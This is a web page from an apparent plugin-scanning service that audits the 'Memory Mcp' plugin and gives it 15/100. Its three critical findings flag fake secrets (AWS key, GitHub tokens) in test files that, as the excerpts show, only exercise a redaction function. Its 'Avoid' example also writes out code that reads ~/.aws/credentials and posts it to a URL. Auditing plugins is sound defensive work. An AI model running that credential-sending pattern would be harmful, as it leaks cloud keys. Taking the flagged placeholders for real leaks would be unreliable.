Memory Mcp— plugin

Memory Mcp — independently scanned and version-tracked by SaferSkills.

by michael-denyer·Plugin·github.com/michael-denyer/memory-mcp

Is Memory Mcp safe to install?

SaferSkills independently audited Memory Mcp (Plugin) and scored it 15/100 (red). The audit ran 55 deterministic rules across Security, Supply Chain, Maintenance, Transparency, and Community; it found 3 high-severity and 0 lower-severity findings. The full rule-by-rule trace and per-finding evidence are below. Free, methodology-open.

Score
15/100
●●○○○○○○○○
↑ +0 since first scan (15 → 15)Re-scan~30s
Latest scan
ScannedJun 24, 2026 · 29d ago
Scans run2 over 90 days
Detectors55 checks · 5 categories
Findings0 warnings · 3 high
EngineSaferSkills 2b638c6
View methodology →
SaferSkills installs
This week0
This month0
All time0
CategoryWeightCategory scoreContribution
Securityprompt, exec, net, exfil, eval
35%
0
0.0 pts
Supply chainhash, typosquat, maintainer, lockfile
20%
100
20.0 pts
Maintenancestaleness, pinning, CI
15%
100
15.0 pts
TransparencySKILL.md, perms, README
15%
100
15.0 pts
Communityinstalls, verify, response
15%
100
15.0 pts

Findings & checks · 3 flagged

Securityscore 0 · 3 findings
CRITICALReads your AWS credentials fileSS-PLUGIN-SECRET-EXFIL-AWS-FILES-01 · Credential exfiltration · tests/test_mining.py
CRITICALfull cloud credentials are tier-1 exfiltration material — a read here can mean total account takeover.
Why it matters

This plugin references the AWS credentials file or the access-key fields stored inside it ("export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI",). Those are long-lived keys with broad cloud access, so any code that reads them can hand your whole AWS account to whatever it contacts next.

The exact value spotted
excerpttests/test_mining.py· python
776"set PASSWORD=secret123",
777"export AUTH_TOKEN=bearer_abc123",
778"export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI",
779]
780for text in sensitive_texts:
Occurrences
1 occurrence · at L778
How to fix
Remove the direct read of ~/.aws/credentials; let the AWS SDK resolve credentials through its standard provider chain instead.
  1. Delete code that opens or parses the credentials file or its key fields by hand.
  2. Use the SDK's default credential resolution so secrets never pass through plugin code or leave the machine.
Avoidcreds = open(os.path.expanduser("~/.aws/credentials")).read() requests.post(url, data={"creds": creds})
Safer pattern# let the SDK resolve credentials; never read or transmit the file yourself import boto3 s3 = boto3.client("s3")
Trace & refs
ruleSS-PLUGIN-SECRET-EXFIL-AWS-FILES-01sha256f45f1bce16d0761erubric 365aacaView on GitHub
CRITICALContains a committed GitHub tokenSS-PLUGIN-SECRET-EXFIL-GH-TOKEN-01 · Credential exfiltration · tests/test_mining.py
CRITICALa committed token is exposed the moment it lands on a public repo — the credential is leaked outright, not merely at risk.
Why it matters

A GitHub token (text = "GitHub token: ghp_abcdefghijklmnopqrstuv…) is committed directly into this plugin's source. Anyone who reads the repo — including everyone who installs the plugin — gets the token, so it must be treated as already compromised.

The exact value spotted
excerpttests/test_mining.py· python
1319from memory_mcp.redaction import redact_secrets
1320 
1321text = "GitHub token: ghp_abcdefghijklmnopqrstuvwxyz0123456789"
1322result = redact_secrets(text)
1323assert "ghp_abcdefghijklmnopqrstuvwxyz" not in result
Occurrences
1 occurrence · at L1321
How to fix
Revoke the leaked token immediately, then remove it from the code and from Git history.
  1. Revoke the token in GitHub settings now — anything pushed is already public.
  2. Delete it from the source and purge it from history; load credentials at runtime from the environment or a secrets store instead.
AvoidGITHUB_TOKEN = "ghp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
Safer pattern# never commit the token; read it at runtime from the environment GITHUB_TOKEN = os.environ["GITHUB_TOKEN"]
Trace & refs
ruleSS-PLUGIN-SECRET-EXFIL-GH-TOKEN-01sha25603aafb028d538b06rubric 365aacaView on GitHub
CRITICALContains a committed GitHub tokenSS-PLUGIN-SECRET-EXFIL-GH-TOKEN-01 · Credential exfiltration · tests/test_storage.py
CRITICALa committed token is exposed the moment it lands on a public repo — the credential is leaked outright, not merely at risk.
Why it matters

A GitHub token (token = ghp_abcdefghijklmnopqrstuvwxyz0123456789) is committed directly into this plugin's source. Anyone who reads the repo — including everyone who installs the plugin — gets the token, so it must be treated as already compromised.

The exact value spotted
excerpttests/test_storage.py· python
194api_key = "sk-1234567890abcdefghijklmnopqrstuvwxyz1234567890abcdef"
195password: mysecretpassword123
196token = ghp_abcdefghijklmnopqrstuvwxyz0123456789
197connection: postgres://user:secretpass@localhost/db
198"""
Occurrences
1 occurrence · at L196
How to fix
Revoke the leaked token immediately, then remove it from the code and from Git history.
  1. Revoke the token in GitHub settings now — anything pushed is already public.
  2. Delete it from the source and purge it from history; load credentials at runtime from the environment or a secrets store instead.
AvoidGITHUB_TOKEN = "ghp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
Safer pattern# never commit the token; read it at runtime from the environment GITHUB_TOKEN = os.environ["GITHUB_TOKEN"]
Trace & refs
ruleSS-PLUGIN-SECRET-EXFIL-GH-TOKEN-01sha25603aafb028d538b06rubric 365aacaView on GitHub
Supply chainscore 100 · 0 findings
All supply chain checks passedNo findings in this category for the latest scan.pass
Maintenancescore 100 · 0 findings
All maintenance checks passedNo findings in this category for the latest scan.pass
Transparencyscore 100 · 0 findings
All transparency checks passedNo findings in this category for the latest scan.pass
Communityscore 100 · 0 findings
All community checks passedNo findings in this category for the latest scan.pass
Vendor response · right of reply
Are you the maintainer? Submit a response →

Audit the pieces. Scan the whole. Decide.

~30 seconds. Free. No account. Every finding cites a rule and a line of evidence.